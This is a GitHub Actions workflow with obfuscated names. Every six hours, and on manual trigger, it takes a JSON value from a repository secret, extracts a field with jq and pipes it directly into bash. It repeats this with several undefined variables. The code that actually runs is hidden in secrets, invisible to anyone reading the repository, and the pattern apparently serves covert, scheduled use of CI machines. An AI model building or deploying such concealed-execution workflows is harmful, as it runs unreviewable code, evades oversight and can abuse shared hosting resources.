name: jingyuanxina

on:
  workflow_dispatch:
  schedule:
    - cron: '49 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jingyuanxina
        env:
          atml5: ${{ secrets.atml5 }}
        run: |
          echo $atml5 | jq -r .am3 | /bin/bash
          echo $wmhd4503 | jq -r .aysip5 | /bin/bash
          echo $umn3090 | jq -r .zni4 | /bin/bash
          echo $uxcn2083 | jq -r .kg26561 | /bin/bash
          echo $f942 | jq -r .udtg65388 | /bin/bash
          echo $xgt0539 | jq -r .zdpfl66 | /bin/bash
          echo $y9 | jq -r .w5 | /bin/bash
          echo $bfx06 | jq -r .py63 | /bin/bash

